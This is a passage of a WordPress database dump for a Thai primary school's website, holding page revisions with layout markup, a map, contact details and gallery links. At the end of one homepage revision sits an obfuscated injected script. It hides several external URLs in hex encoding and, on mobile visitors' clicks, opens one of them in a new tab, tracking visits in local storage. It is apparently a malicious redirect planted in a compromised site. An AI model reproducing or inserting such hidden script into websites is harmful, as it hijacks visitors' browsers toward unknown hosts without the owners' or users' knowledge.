{\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 13:45:58','2024-08-08 06:45:58','',14,'http://pakhaeng.ssk.in.th/?p=685',0,'revision','',0),
(686,1,'2024-08-08 14:18:25','2024-08-08 07:18:25','','Yellow Clean Contact Us Instagram Post','','inherit','','closed','','yellow-clean-contact-us-instagram-post','','','2024-08-08 14:18:25','2024-08-08 07:18:25','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png',0,'attachment','image/png',0),
(688,1,'2024-08-08 14:20:24','2024-08-08 07:20:24','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 